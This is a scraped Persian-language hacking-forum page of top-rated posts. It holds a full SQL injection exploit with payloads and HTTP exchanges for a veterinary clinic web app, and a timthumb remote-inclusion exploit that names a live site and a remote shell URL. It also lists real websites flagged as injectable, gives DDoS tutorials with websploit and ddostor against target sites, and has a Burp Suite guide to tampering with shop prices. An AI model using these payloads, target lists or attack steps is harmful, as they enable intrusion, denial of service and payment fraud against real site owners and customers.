    # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  14. 4 امتیاز
    # Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution # Google Dork: Index of /wp-content/plugins/aio-shortcodes # Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php # Date: 26 Oktober 2018 # Author: L4663r666h05t # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.x.x # Screenshot: http://prntscr.com/lahts7 # Tested on: Windows 10 Pro (x64) Versions Affected: 1.x.x Live Site: http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Your Shell: http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php
  15. 4 امتیاز
    با سلام دوست عزیز در این تاپیک این موضوع اموزش داده شده اگر باز مشکل شما حل نشد در همین تاپیک اطلاع دهید تا اساتید مشکلتونو حل کنن https://anonysec.org/topic/2802-اموزش-هک-مرورگر-وب-با-استفاده-از-beef/ موفق باشید
  16. 4 امتیاز
    http://www.thesunbook.com/shoping.php?id=18%27 http://www.monitoringris.org/index.php?id=30%27 www.nb-medicalsystem.com/kindeditor/examples/uploadbutton.html www.znmeter.com/admin/kindeditor/examples/uploadbutton.html mmedi.cc/Public/js/kindeditor/examples/uploadbutton.html http://www.anjuta.ru/index.php?id=price_r%27 http://cedarforestproducts.com/photogallery.php?level=slideshow&mode=album&id=35%27 http://www.thecryers.com/gallery.php?id=9%27
  17. 4 امتیاز
    با سلام درخواستی داشتم در باره اضافه شدن بخش ثبت دیداسینگ مثلا وقتی یک سایت را درمورد حمله دیداس میکنیم و وب سرور اف میشود بنویسیم حمله دیداس به سایت ... در تاریخ ... توسط تیم انونیسک اگر اضافه شود خیلی متشکر میشم باز مننون
  18. 4 امتیاز
    یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  19. 4 امتیاز
    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  20. 3 امتیاز
    kaka

    beef

    انجام میدم نمیشه ... همون اول همه چیزو امتحان کردم
  21. 3 امتیاز
    kaka

    beef

    مشکل از مرورگر نیس چون میتونم تو تموم سایتها میتونم برم از اینترنتم هم نیس چون پینگ دارم اما آیپی و پورت رو چند بذارم ؟
  22. 3 امتیاز
  23. 3 امتیاز
  24. 3 امتیاز
  25. 3 امتیاز
    با سلام با اموزش تغییر قیمت محصولات با ابزار Burp suite با شما هستیم خب ابتدا مرورگر خود را باز کنید و در قسمت پروکسی های local خود را تظیم کنید (localhost:808) قبل از این که تنظیم بکنید ادرس سایتی که قصت هک کردنشو دارید رو باز کنید و بعد پروکسی را تنظیم کنید . ابزار Burp suite با زکنید . به قسمت proxy بروید و به بخش intercept بروید و گذینه intercept را on کنید بعد به مروگر خود باز گردید و محصولی که انتخواب کرده بودید را خرید را بزنید به Burp suite برگردید با دقت به کد ها نگاه کنید و اعداد در جایی که payment نوشته و قیمت محصول را نوشته و قیمت خود را وارد کرده و روی forward کلیک کنید الان به جایی میرسه که ازتون میگه سفارش را تایید میکنید بله را بزنید و به جای قیمت محصول قیمت انتخوابی شما را کثر کند . توجه : قبلا این روش را روی یکی از سایت های خارجی تست کردن جواب مثبت گرفتم . استفاده نادرست از اموزش بر عهده خود شخص است . با تشکر
این صفحه از پرچمداران بر اساس منطقه زمانی تهران/GMT+03:30 می باشد